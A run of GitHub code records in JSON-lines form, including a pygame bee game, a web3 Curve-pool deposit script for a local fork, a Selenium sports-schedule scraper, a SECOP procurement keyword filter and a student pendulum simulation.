results\n date = parser.parse(match['Date'])\n opponent_name = match['Opponent'].replace('At ', '')\n opponent_school = self._school(opponent_name)\n school_score, opponent_score = sorted(results, reverse=match['Result'] == 'Win')\n race = Race(school_id=self._school().id, opponent_id=opponent_school.id, date=date.date(), school_score=school_score, opponent_score=opponent_score)\n self.races[self._school().id].append(race)\n\n def scrape(self):\n while True:\n try:\n tr_elements = self._doc.xpath('//tr')\n break\n except:\n time.sleep(1)\n\n columns = [t.text_content() for t in tr_elements[0]]\n for elem in tr_elements[1:]:\n match = {}\n for col, val in zip(columns, elem):\n match[col] = val.text_content()\n self._create_race(match)\n return True\n","repo_name":"mebling/nessa_standings","sub_path":"results_scraper.py","file_name":"results_scraper.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24388274303","text":"# Global Game Jam 2020\n# 2020-01-31 bis 2020-02-03\n\n# import\nimport os\nimport pygame\nimport numpy as np\nimport threading\nimport subprocess\n\nfrom map import Map\n\nimport random\nimport queue\nimport time\n\nfrom bee import Bee\nfrom htmlhandler import make_app\nimport tornado\nimport hive\nfrom constants import *\n\nimport bot\nfrom asset import Flower, Intruder, Wax, Weapon\nfrom constants import FPS\n\nimport colorsys\n\npygame.init()\n\ncurrent_path = os.path.dirname(__file__)\n\n\n# initialize the pygame 
module\n# load and set the logo\npygame.display.set_caption(\"First Try\")\n\nclass GameManager:\n def __init__(self, telegram=False, temperature_game_over=True):\n # Define Screen Size\n self.disp_height = DISP_HEIGHT\n self.disp_width = DISP_WIDTH\n\n self.t0 = time.time()\n\n # self.screen = pygame.display.set_mode((self.disp_width, self.disp_height))\n self.screen = pygame.display.set_mode((0,0),pygame.FULLSCREEN)\n\n self.grid_height = GRID_HEIGHT\n self.grid_width = GRID_WIDTH\n\n self.map = Map(self.grid_height, self.grid_width)\n\n self.bees = {\n }\n\n self.thermometer = pygame.image.load(os.path.join(current_path, 'Thermometer_grey.png'))\n self.game_over_win = pygame.image.load(os.path.join(current_path, 'Game_Finished_Repaired.png'))\n self.game_over_heat = pygame.image.load(os.path.join(current_path, 'Game_Finished_T_high.png'))\n self.game_over_cold = pygame.image.load(os.path.join(current_path, 'Game_Finished_T_low.png'))\n\n h = self.game_over_win.get_height()\n w = self.game_over_win.get_width()\n scale = min(0.8 * DISP_HEIGHT/h, 0.8 * DISP_WIDTH/w)\n\n self.game_over_win = pygame.transform.scale(self.game_over_win, (int(w * scale), int(h * scale)))\n self.game_over_heat = pygame.transform.scale(self.game_over_heat, (int(w * scale), int(h * scale)))\n self.game_over_cold = pygame.transform.scale(self.game_over_cold, (int(w * scale), int(h * scale)))\n\n self.queue = queue.Queue(maxsize=10)\n\n self.webserver = make_app(self.queue)\n self.webserver.listen(8090)\n\n self.hive = hive.Hive(self.grid_height, self.grid_width)\n\n self.tornado_target = tornado.ioloop.IOLoop.current()\n self.tornado_thread = threading.Thread(target=self.tornado_target.start)\n self.tornado_thread.start()\n\n self.bot_queue = queue.Queue()\n if telegram:\n self.bot = bot.Bot(self.bot_queue)\n\n self.temperature = 150\n self.temperature_game_over = temperature_game_over\n self.temperature_limits = [0, 210]\n\n background_path = os.path.join(current_path, 'background_bees.ogg')\n dance_path = os.path.join(current_path, 'wild_bees.ogg')\n\n\n self.base_volume = 0.2\n self.background_sound = pygame.mixer.Sound(background_path)\n self.background_sound.set_volume(self.base_volume)\n self.dance_sound = pygame.mixer.Sound(dance_path)\n self.dance_sound.set_volume(self.base_volume)\n\n def new_color(self):\n # color = colorsys.hsv_to_rgb(random.random(),1,1)\n # return tuple([int(255*i) for i in color])\n color = pygame.Color(0,0,0)\n color.hsva = (random.randint(0,360),100,100,100)\n return (color.r,color.g,color.b)\n # needs futher work\n colors = np.array([colorsys.rgb_to_hsv(*bee.color) for bee in self.bees.values()])\n colors_hue = np.array([c[0] for c in colors])\n if len(colors) <= 2:\n return tuple([255*i for i in colorsys.hsv_to_rgb(random.random(),1,1)])\n else:\n color_diff = np.roll(colors_hue,1) - colors_hue\n print(colors_hue)\n print(color_diff)\n index = np.argmax(np.abs(color_diff))\n print(index)\n new_hue = colors_hue[index]+color_diff[index]/2\n color = (int(255*(new_hue)+255)%255, 255, 255)\n print(new_hue)\n return color\n\n def add_bee(self, id):\n valied = False\n while not valied:\n x = random.randint(0, self.hive.rows)\n y = random.randint(0, self.hive.cols)\n valied = self.hive.is_valid((x,y))\n\n color = self.new_color()\n self.bees.update({id: Bee((x,y), id=id, color=color)})\n\n def add_flower(self):\n pos_found = False\n while not pos_found:\n pos = self.hive.flower_spawn_pos[random.randint(0,len(self.hive.flower_spawn_pos)-1)]\n if self.hive.is_valid(pos):\n pos_found = 
True\n self.hive.flowers.append(Flower(pos))\n\n def handle_bot_queue(self):\n while(not self.bot_queue.empty()):\n item = self.bot_queue.get()\n if item == \"flower\":\n self.add_flower()\n if item == \"intruder\":\n self.hive.place_intruder()\n if item == \"weapon\":\n self.hive.place_weapon()\n\n def handle_input(self):\n while(not self.queue.empty()):\n id, cmd = self.queue.get()\n\n if (cmd == \"kill\"):\n try:\n del self.bees[id]\n except:\n print(\"Kill Error\")\n elif not id in self.bees:\n self.add_bee(id)\n else:\n if cmd == 'action':\n self.dance(id)\n self.repair_comb(id)\n self.drop_wax(id)\n self.attack(id)\n self.pick_up(id)\n else:\n dir = html_dict[cmd]\n if id in self.bees:\n self.move_bee(id,dir)\n def dance(self, id):\n bee = self.bees[id]\n bee.dance()\n\n def drop_wax(self,id):\n bee = self.bees[id]\n for fm in self.hive.flower_machines:\n if bee.grid_pos == fm.input:\n if isinstance(bee.item, Flower):\n bee.item = None\n self.hive.wax.append(Wax(fm.output))\n\n def animate_bees(self):\n # calculate next position on bee path\n for bee in self.bees.values():\n target_pos = np.array(bee.get_target_pos())\n current_pos = np.array(bee.surface_pos)\n path = target_pos - current_pos\n #print(np.linalg.norm(path))\n if np.linalg.norm(path) < 5:\n #print(\"summen\")\n r = random.random()\n dir = np.array([r, 1.0-r])\n dir = dir/np.linalg.norm(dir)\n amplitude = random.random() * 2\n bee.surface_pos = current_pos + amplitude * dir\n else:\n #print(\"move\")\n step = 0.4\n bee.surface_pos = current_pos + step * path\n\n def draw_bees(self, surface=None):\n if surface is None:\n surface = self.screen\n for bee in self.bees.values():\n bee.paint(surface)\n\n def move_bee(self, id, direction):\n try:\n pos = self.bees[id].new_pos(direction)\n if self.hive.is_valid(pos):\n self.bees[id].move_bee(pos)\n except:\n pass\n\n def pick_up(self, id):\n pos = self.bees[id].grid_pos\n for item_list in self.hive.items:\n for i,item in enumerate(item_list):\n if item.grid_pos == pos:\n del item_list[i]\n self.drop(id)\n self.bees[id].pick_up(item)\n continue\n\n def drop(self, id):\n item = self.bees[id].item\n if isinstance(item, Flower):\n self.hive.flowers.append(Flower(self.bees[id].grid_pos))\n elif isinstance(item, Wax):\n self.hive.flowers.append(Wax(self.bees[id].grid_pos))\n elif isinstance(item, Weapon):\n self.hive.flowers.append(Weapon(self.bees[id].grid_pos))\n self.bees[id].item = None\n\n def repair_comb(self, id):\n if isinstance(self.bees[id].item, Wax):\n for i in html_dict:\n pos = self.bees[id].new_pos(html_dict[i])\n if self.hive.exists(pos):\n if not self.hive.cell_state[pos]:\n for intr in self.hive.intruders:\n if intr.grid_pos == pos:\n break\n else: # executed only if intr loop did not break -> no intruder on pos\n self.hive.cell_state[pos] = 1\n self.bees[id].item = None\n return\n continue # executed if intr loop did break -> pos occupied by intruder\n\n def attack(self,id):\n if isinstance(self.bees[id].item, Weapon):\n for i in html_dict:\n pos = self.bees[id].new_pos(html_dict[i])\n for intr in self.hive.intruders:\n if intr.grid_pos == pos:\n self.hive.intruders.remove(intr)\n return\n\n\n def draw_items(self, surface=None):\n if surface is None:\n surface = self.screen\n for item_list in self.hive.items:\n for item in item_list:\n item.paint(surface)\n\n def apply_temperature(self):\n total_dancers = sum(bee.isdancer() for bee in self.bees.values())\n total_bees = len(self.bees)\n\n self.temperature += float(total_dancers)/(total_bees+1) - 0.25\n 
self.temperature = min(max(self.temperature, self.temperature_limits[0]), self.temperature_limits[1])\n\n def draw_flower_machine(self):\n for fm in self.hive.flower_machines:\n fm.draw(self.screen)\n\n def draw_temperature(self, surface=None):\n if surface is None:\n surface = self.screen\n width = 30\n height = min(210,max(0,int(self.temperature)))\n\n self.screen.fill((0, 0, 0))\n\n warning_level_red = warning_level_green = warning_level_blue = 0\n if self.temperature > self.temperature_limits[1] * 0.7:\n freq = (time.time() - self.t0) * 2\n warning_level_red = max(0, int(255 * (np.abs(np.sin(freq)))))\n elif self.temperature < self.temperature_limits[1]*0.3:\n freq = (time.time() - self.t0 ) * 2\n warning_level_blue = max(0,int( 255 * (np.abs(np.sin(freq)))))\n else:\n warning_level_green = 255\n\n thermometer_current = self.thermometer.copy()\n pygame.draw.circle(thermometer_current, (warning_level_red, warning_level_green, warning_level_blue), (35, 273), 30)\n pygame.draw.rect(thermometer_current, (warning_level_red,warning_level_green, warning_level_blue), ((22,247-height), (width,height)))\n thermometer_current.blit(self.thermometer, ((0,0), (0, 0)))\n\n surface.blit(thermometer_current, ((int(self.disp_width * 0.90),int(self.disp_height * 0.2)), (0, 0)))\n\n def check_game_over(self):\n if sum(state == 0 for state in self.hive.cell_state.values()) == 0:\n return (True, 'WIN')\n elif self.temperature_game_over:\n if self.temperature <= self.temperature_limits[0]:\n print(\"Bees froze to death!\")\n return (True, 'COLD')\n elif self.temperature >= self.temperature_limits[1]:\n print(\"Bees suffocated to the heat!\")\n return (True, 'HEAT')\n return (False, None)\n\n def draw_game_over(self, reason):\n if reason == 'WIN':\n self.screen.blit(self.game_over_win, ((DISP_WIDTH/10, DISP_HEIGHT/10), (0,0)))\n elif reason == 'HEAT':\n self.screen.blit(self.game_over_heat, ((DISP_WIDTH/10, DISP_HEIGHT/10), (0,0)))\n elif reason == 'COLD':\n pass\n self.screen.blit(self.game_over_cold, ((DISP_WIDTH/10, DISP_HEIGHT/10), (0,0)))\n\n def audio_settings(self):\n num_bees = len(self.bees)\n num_dancer = sum([bee.isdancer() for bee in self.bees.values()])\n\n pygame.mixer.Channel(1).set_volume(self.audio_function(num_bees))\n pygame.mixer.Channel(2).set_volume(self.audio_function(num_dancer) if num_dancer > 0 else 0)\n # print(self.background_sound.get_volume())\n # print(pygame.mixer.Channel(1).get_volume())\n\n def audio_function(self, x):\n return self.base_volume + (1-self.base_volume)*min(1,x/10)\n\n\n# define a main function\ndef main():\n subprocess.run([\"mpv\", \"--fs\", \"BEE_Intro.mpg\"])\n\n reason = None\n\n game = GameManager(telegram=True)\n pygame.mixer.pre_init()\n pygame.mixer.init()\n # pygame.mixer.music.load(sound_path)\n\n pygame.mixer.Channel(1).play(game.background_sound, loops=-1)\n pygame.mixer.Channel(2).play(game.dance_sound, loops=-1)\n\n # Key Dictionary\n key_dict = {\n # pygame.key : (xmove, ymove, bee_id)\n pygame.K_w : (-1,-1, 0),\n pygame.K_e : (-1,0, 0),\n pygame.K_d : (0,1, 0),\n pygame.K_x : (1,1, 0),\n pygame.K_y : (1,0, 0),\n pygame.K_a : (0,-1, 0),\n pygame.K_u: (-1, -1, 1),\n pygame.K_i: (-1, 0, 1),\n pygame.K_k: (0, 1, 1),\n pygame.K_m: (1, 1, 1),\n pygame.K_n: (1, 0, 1),\n pygame.K_h: (0, -1, 1)\n }\n\n # define a variable to control the main loop\n game_over = False\n\n # define Radius from gridsize and screensize\n clock = pygame.time.Clock()\n\n # main loop\n while not game_over:\n clock.tick(FPS)\n # event handling, gets all event from the event 
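Editor's note on the GGJ2020.py record above: the hive clamps temperature with nested min/max and maps crowd size to mixer volume via base + (1 - base) * min(1, x / 10). A tiny standalone check of both helpers, taking the record's limits (0-210) and base volume (0.2) as the assumed constants:

def clamp(value, low, high):
    """Keep value inside [low, high], as the temperature update does."""
    return min(max(value, low), high)

def volume(count, base=0.2):
    """Rise from the base volume toward 1.0 as count approaches 10."""
    return base + (1 - base) * min(1, count / 10)

assert clamp(250, 0, 210) == 210
assert clamp(-5, 0, 210) == 0
assert volume(0) == 0.2 and volume(10) == 1.0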
queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.KEYDOWN:\n try:\n xy_move = key_dict[event.key]\n game.move_bee(xy_move[2],(xy_move[0], xy_move[1]))\n except:\n pass\n if event.key == pygame.K_PLUS:\n game.add_bee(random.randint(0,100))\n if event.key == pygame.K_SPACE:\n game.add_flower()\n if event.key == pygame.K_ESCAPE:\n game_over = True\n if event.key == pygame.K_0:\n game.temperature_game_over = not game.temperature_game_over\n if game.temperature_game_over:\n print(\"enable game over\")\n else:\n print(\"disable game over\")\n if event.type == pygame.QUIT:\n # change the value to False, to exit the main loop\n game_over = True\n print(\"Waiting for Tornado\")\n game.tornado_target.stop()\n game.tornado_thread.join(1)\n print(\"Tornado joined\")\n\n game.handle_input()\n game.handle_bot_queue()\n game.apply_temperature()\n game.audio_settings()\n\n game.draw_temperature()\n\n game.animate_bees()\n game.hive.draw_grid(game.screen)\n game.draw_flower_machine()\n game.draw_bees()\n\n game.draw_flower_machine()\n game.draw_items()\n\n if not game_over:\n (game_over, reason) = game.check_game_over()\n\n if game_over:\n game.draw_game_over(reason)\n\n pygame.display.flip()\n # draw a line\n\n if reason is not None:\n time.sleep(7)\n\n pygame.display.quit()\n if hasattr(game, 'bot'):\n game.bot.kill()\n pygame.quit()\n\n# run the main function only if this module is executed as the main script\n# (if you import this as a module then nothing is executed)\nif __name__ == \"__main__\":\n # call the main function\n main()\n","repo_name":"MiningXL/ggj2020","sub_path":"GGJ2020.py","file_name":"GGJ2020.py","file_ext":"py","file_size_in_byte":15601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"30985189954","text":"from web3 import Web3, HTTPProvider\nimport sys\nimport os\nimport json\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nw3 = Web3(HTTPProvider(os.environ['FORK_URI'],request_kwargs={'timeout':60}))\n\naccount = w3.eth.account.from_key(os.environ['FORK_PRIVATE_KEY'])\n\n\nwith open(os.path.join(sys.path[0], \"../../abi/CurvePool.json\")) as f:\n CurveGauge_ABI = json.load(f)\nwith open(os.path.join(sys.path[0], \"../../abi/IERC20.json\")) as f:\n IERC20_ABI = json.load(f)\n\ntoken_address = \"0x956F47F50A910163D8BF957Cf5846D573E7f87CA\"\npool_address = \"0xBaaa1F5DbA42C3389bDbc2c9D2dE134F5cD0Dc89\"\n\n\nPool = w3.eth.contract(abi=CurveGauge_ABI, address=pool_address)\ntoken = w3.eth.contract(abi=IERC20_ABI, address=token_address)\n\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n# Parameters to update\namount = w3.toWei(1200000, 'ether')\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n\nprint(\"Deposit in Pool\")\nprint()\n\nprint(\"Approve tx:\")\n\ntx_dict = token.functions.approve(pool_address, amount).buildTransaction({\n 'from' : account.address,\n 'nonce' : w3.eth.getTransactionCount(account.address),\n 'maxFeePerGas': w3.toWei(105, 'gwei'),\n 'maxPriorityFeePerGas' : w3.toWei(5, 'gwei')\n})\n\nresult = w3.eth.send_raw_transaction((w3.eth.account.sign_transaction(tx_dict, account.key)).rawTransaction)\nprint(result.hex())\ntxReceipt = w3.eth.wait_for_transaction_receipt(result)\nif(txReceipt.status == 1):\n print(\"Success\")\nelse:\n print(\"Tx 
failed\")\n\n\n\nprint()\nprint(\"Deposit tx:\")\ntx_dict = Pool.functions.add_liquidity([0, amount, 0], w3.toWei(1000000, 'ether')).buildTransaction({\n 'from' : account.address,\n 'nonce' : w3.eth.getTransactionCount(account.address),\n 'maxFeePerGas': w3.toWei(105, 'gwei'),\n 'maxPriorityFeePerGas' : w3.toWei(5, 'gwei')\n})\n\nresult = w3.eth.send_raw_transaction((w3.eth.account.sign_transaction(tx_dict, account.key)).rawTransaction)\nprint(result.hex())\ntxReceipt = w3.eth.wait_for_transaction_receipt(result)\nif(txReceipt.status == 1):\n print(\"Success\")\nelse:\n print(\"Tx failed\")\n\n","repo_name":"Kogaroshi/ethcc-hack-warden","sub_path":"scripts/fork/lp.py","file_name":"lp.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8185355205","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom .models import Event\nfrom dotenv import load_dotenv \nimport time\nimport os\nimport re\n\nload_dotenv('.env')\n\ndef getData():\n arr = []\n options = Options()\n options.headless = True\n browser = webdriver.Firefox(options=options)\n\n browser.get(os.getenv('BASE_URL'))\n browser.implicitly_wait(1)\n\n for date in browser.find_elements_by_css_selector(os.getenv('DATE')):\n inDate = {\"date\": '', \"tournament\": '', \"events\": [] }\n cDate = date.find_elements_by_css_selector(os.getenv('DATE_TITLE'))[0]\n inDate[\"date\"] = cDate.text\n for tournament in date.find_elements_by_css_selector(os.getenv('TOURNAMENT')):\n for title in tournament.find_elements_by_css_selector(os.getenv('TOURNAMENT_TITLE')):\n inDate[\"tournament\"] = title.text\n for ev in tournament.find_elements_by_css_selector(os.getenv('EVENT')):\n for events in ev.find_elements_by_css_selector(os.getenv('EVENT_SELECTOR')):\n hour = events.find_element_by_css_selector(os.getenv('CUSTOM1'))\n match = events.find_element_by_css_selector(os.getenv('CUSTOM2'))\n tv = events.find_element_by_css_selector(os.getenv('CUSTOM3'))\n obj = { \n \"match\" : match.text,\n \"hour\": hour.text,\n \"tv\": tv.text\n }\n instance = Event.objects.create(date=inDate[\"date\"], tournament=inDate[\"tournament\"], hour=hour.text, match=match.text, tv=tv.text)\n print(instance)\n inDate[\"events\"].append(obj)\n arr.append(inDate)\n browser.quit()\n return arr\n\ndef index(arg1):\n return HttpResponse('hello')\n\ndef we(arg1):\n first_event_date = Event.objects.filter(date=\"LUNES 04 DE ENERO\")\n print(first_event_date[0])\n return HttpResponse(first_event_date[0])\n # arr = getData()\n # return HttpResponse(arr)\n\ndef time(request, date):\n arr = getData() \n dateMapper = {\n \"today\": 1,\n \"tomorrow\": 2,\n \"day-after-tomorrow\": 3\n }\n index = dateMapper[date]\n print(arr[index])\n return HttpResponse(arr[index])\n","repo_name":"jmmzzei/sports-agenda-api","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"85283697","text":"import json as json\nimport csv\nimport pandas as pd\nfrom sodapy import Socrata\n\n#Implementacion KMP\ndef KMPSearch(pat, txt):\n if pat is \"\":\n return True\n M = len(pat) \n N = len(txt) \n lps = [0]*M \n j = 0\n computeLPSArray(pat, M, lps) \n i = 0 \n while i < N: \n if pat[j] == txt[i]: \n i += 1\n j 
+= 1\n \n if j == M: \n j = lps[j-1] \n return True\n elif i < N and pat[j] != txt[i]: \n if j != 0: \n j = lps[j-1] \n else:\n i += 1\n if i == N:\n return False\n \ndef computeLPSArray(pat, M, lps): \n len = 0 \n lps[0] \n i = 1\n while i < M: \n if pat[i]== pat[len]: \n len += 1\n lps[i] = len\n i += 1\n else: \n if len != 0: \n len = lps[len-1] \n else: \n lps[i] = 0\n i += 1\n\n\nscd1=\"Soluciones ciudadanos digitales\"\nscd = [\"aarpeta ciudadana\", \"autenticacion digital\",\"autenticacion electronica\",\n \"certificados digitales\",\"firmas digitales\",\"firma digital\",\n \"servicios de certificacion digital\",\"carpeta electronica\",\n \"interoperabilidad\",\"x-road\",\"x road\",\"estampado cronologico\"\n \"sellado de tiempo\",\"Servicios ciudadanos digitales\"]\n\nsem1= \"Soluciones con enfoque misional\"\nsem = [\"realizacion de eventos\",\"eventos institucionales\",\"organizacion y coordinacion integral de los eventos\"]\n\nsci1=\"Soluciones ciudades inteligentes\"\nsci = [\"smartcities\",\"semaforos inteligentes\"]\n\nsdp1=\"Soluciones de participacion\"\nsdp = [\"votaciones\",\"consultas ciudadanas\"]\n\nsgd1=\"Soluciones en gestion documental\"\nsgd = [\"gestion de archivo\",\"digitalizacion de documentos\",\"indexacion de documentos\"\n \"gestion documental\",\"documental\",\"almacenamiento\",\"administracion documental integral\",\n \"digitalizacion\",\"sistema documental\",\"bpo\"]\n\noti1=\"Outsourcing TI\"\noti = [\"procesos con dos o mas componentes diversos de los numerales 6\"]\n\ndtc1=\"Datacenter\"\ndtc = [\"data center, back up, centro de datos, migracion de datos\"]\n\nntk1=\"Networking\"\nntk = [\"redes lan y/o wan, cableado\", \"switch\", \"switches\", \"networking\",\n \"servicio de canales terrestres\",\"satelites e internet\"]\n\ncmc1=\"Comunicaciones\"\ncmc = [\"videoconferencias\",\"telecomunicaciones\",\"voz y datos\", \"video y seguridad\"\n \"red de datos\",\"inalambricas\",\"seguridad perimetral\"]\n\nsgt1=\"Servicio de gestion de ti\"\nsgt = [\"mesa de ayuda\",\"help desktop\",\"contaccenter\",\"centro de contacto\",\n \"infraestructura tecnologica\",\"plataforma tecnologica\",\"sistemas operativos\",\n \"aplicacion\",\"autentificacion y cifrado\",\"software de monitoreo y control\",\n \"pruebas de infraestructura y aplicacion\",\"bases de datos\"]\neyd1=\"Equipos y dispositivos\"\neyd = [\"computadores\",\"escritorios\",\"mouse\",\"equipos y perifericos\"]\n\nimi1=\"Impresion inteligente\"\nimi = [\"print\",\"impresion\",\"fotocopiadoras\"]\n\nurl_procesos = []\n\n\n#Filtro primero por entidades y luego por referencia de proceso\n# Retorna una tupla de 3 con el portafolio del proceso, el proceso de referecia y el link del proceso\ndef filterLicit(entidad, ref_proc):\n entidad=entidad.lower()\n ref_proc=ref_proc.lower()\n ruta =(\"/users/hugherli/Documents/GitHub/fulldatos.csv\")\n with open(ruta, encoding=\"utf-8\") as ff:\n csv_reader = csv.reader(ff, delimiter=',')\n for row in csv_reader:\n #Descripcion\n des = row[10].lower()\n #Id del proceso\n id_proc= row[28]\n #url para la descarga de los archivos\n url = row[50]\n #Entidad que publica la licitacion\n enti = row[12].lower()\n #codigo de referencia del proceso\n ref = row[44].lower()\n #presupuesto base para la licitacion\n presupuesto = row[39]\n #Modalidad de contratacion\n modalidad = row[31]\n #Duracion de la licitacion en la medida que salga en la columna 49\n duracion = row[11]+\" \"+row[49]\n #Contratista \n contratatista = row[35]\n\n if presupuesto.split(\".\")[0].isdigit():\n \n if 
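Editor's note on the datalicit.py record above: its KMP has a few rough edges, e.g. the identity comparison `pat is ""`, a no-op `lps[0]` statement in computeLPSArray, and early returns woven through the scan loop. A conventional boolean KMP for comparison, offered as a sketch rather than a drop-in replacement:

def kmp_contains(pattern, text):
    """Return True if pattern occurs in text (classic Knuth-Morris-Pratt)."""
    if pattern == "":
        return True
    # lps[i]: length of the longest proper prefix of pattern[:i+1]
    # that is also a suffix of it.
    lps = [0] * len(pattern)
    k = 0
    for i in range(1, len(pattern)):
        while k and pattern[i] != pattern[k]:
            k = lps[k - 1]
        if pattern[i] == pattern[k]:
            k += 1
        lps[i] = k
    j = 0
    for ch in text:
        while j and ch != pattern[j]:
            j = lps[j - 1]
        if ch == pattern[j]:
            j += 1
        if j == len(pattern):
            return True
    return False

assert kmp_contains("aba", "cabad")
assert not kmp_contains("abc", "ab")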
int(presupuesto.split(\".\")[0]) < 100000000:\n continue\n \n if KMPSearch(entidad ,enti):\n if KMPSearch(ref_proc, ref):\n \n for kw in scd:\n if KMPSearch(kw, des):\n url_procesos.append((scd1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sem:\n if KMPSearch(kw, des):\n url_procesos.append((sem1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sci:\n if KMPSearch(kw, des):\n url_procesos.append((sci1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sdp:\n if KMPSearch(kw, des):\n url_procesos.append((sdp1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in sgd:\n if KMPSearch(kw, des):\n url_procesos.append((sgd1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in oti:\n if KMPSearch(kw, des):\n url_procesos.append((oti1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in dtc:\n if KMPSearch(kw, des):\n url_procesos.append((dtc1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in ntk:\n if KMPSearch(kw, des):\n url_procesos.append((ntk1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in cmc:\n if KMPSearch(kw, des):\n url_procesos.append((cmc1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sgt:\n if KMPSearch(kw, des):\n url_procesos.append((sgt1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in eyd:\n if KMPSearch(kw, des):\n url_procesos.append((eyd1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in imi:\n if KMPSearch(kw, des):\n url_procesos.append((imi1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n else:\n continue\n else:\n continue\n \n for x in url_procesos:\n somedict = {\"portafolio\":[ x[0] for x in url_procesos ],\n \"descripcion\":[ x[1] for x in url_procesos ],\n \"entidad\":[ x[2] for x in url_procesos ],\n \"modalidad\":[ x[3] for x in url_procesos ],\n \"contratista\":[ x[4] for x in url_procesos ],\n \"ref_proceso\":[ x[5] for x in url_procesos ],\n \"presupuesto\":[ x[6] for x in url_procesos ],\n \"duracion\":[ x[7] for x in url_procesos ],\n \"url_descarga\":[ x[8] for x in url_procesos]}\n return somedict\n","repo_name":"Andresalsu/datalicit","sub_path":"Back SECOP/datalicit.py","file_name":"datalicit.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26248366208","text":"import math as m\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass PendulumSpring:\r\n def __init__(self, name = 'Pendulum', mass = 1.0, theta = m.pi/9, g = -9.81, nl = 1.0, hc = 1, pos=[0,0,0], vel=[0,0,0], acln = [0,0,0], spring=False):\r\n\r\n pos=[nl*m.sin(theta),nl*m.cos(theta),0]\r\n self.name = name\r\n self.mass = 1\r\n self.pos = pos\r\n self.vel = vel\r\n self.acln = acln\r\n self.g = g\r\n self.nl = nl\r\n self.hc = hc\r\n self.thetta = theta\r\n self.spring = spring\r\n\r\n def UpdateAcceleration():\r\n self.theta = abs(m.atan(self.pos[0]/self.pos[1]))\r\n self.acln = [self.g*m.tan(self.theta), self.g*1-m.cos(self.theta), 0]\r\n if self.spring == True:\r\n ext = sqrt(sum(x**2 for x in self.pos)) - self.nl\r\n acln = self.hc * ext / self.mass\r\n self.acln += [acln*m.sin(self.theta), acln*m.cos(self.theta), 0]\r\n\r\n def ER_update(self,deltaT):\r\n self.position += 0.5 * self.velocity * 
deltaT\r\n self.velocity += 0.5 * self.acceleration * deltaT\r\n \r\n \r\n \r\n\r\n\r\nPendulum1 = PendulumSpring(name='Pendulum1')\r\ndeltaT = 1\r\nData = []\r\nfor i in range(1,100):\r\n Pendulum1.UpdateAcceleration()\r\n Pendulum1.ER_update(deltaT)\r\n T.append(i)\r\n posx.append(Pendulum1.pos[0])\r\n posy.append(Pendulum1.pos[1])\r\n length.append(sqrt(sum(x**2 for x in self.pos)))\r\n \r\n\r\nfig = plt.figure()\r\nax = plt.axes()\r\nax.set_ylabel('y')\r\nax.set_xlabel('x')\r\nplt.scatter(posx, posy)\r\nplt.shwow()\r\n","repo_name":"abansal3/PHYS389Project","sub_path":"PendulumSpringClass.py","file_name":"PendulumSpringClass.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13389055243","text":"from setuptools import setup , find_packages\n\nwith open('README.md','r', encoding='utf8') as f:\n LONG_DESCRIPTION=f.read()\n\nAUTHOR='nitesh kumar gupta'\nEMAIL='guptanitesh2711@gmail.com'\n__version__='0.0.1'\n\n\nsetup(name='deepclassifier-Xray',\nauthor=AUTHOR,\nauthor_email=EMAIL,\nlicense='MIT',\nversion=__version__,\n#install_requires=['tensorflow','pandas','numpy','matplotlib'],\npackages=find_packages(where=\"src\"),\n# look for packages in ths directory/this is the base directory\nlong_description=LONG_DESCRIPTION,\nurl='https://github.com/niteshgupta2711/XRAY_Classification',\npackage_dir={\"\": \"src\"},\nproject_urls={'Bug Tracker ': 'https://github.com/niteshgupta2711/XRAY_Classification'},\n)","repo_name":"niteshgupta2711/XRAY_Classification","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"30890388975","text":"# Python code to find positive number in a list\n\nlst =[]\nnum = int(input(\"Enter the number of elements to insert: \"))\n\nfor i in range(0, num):\n ele = int(input(\"Enter both positive and negative number: \"))\n lst.append(ele)\n\nprint(\"Entered list is: \",lst)\n\nprint(\"Positive number in list: \")\nfor x in lst:\n if x>=0:\n print(x,end=\" \")","repo_name":"shubhamkochar/Python_Codes","sub_path":"List/PositiveNumbersInList.py","file_name":"PositiveNumbersInList.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22935714438","text":"import grpc\n\nimport detect_image_pb2\nimport detect_image_pb2_grpc \n# Open a grpc channel\nfrom PIL import Image\nimport sys\n\nclass 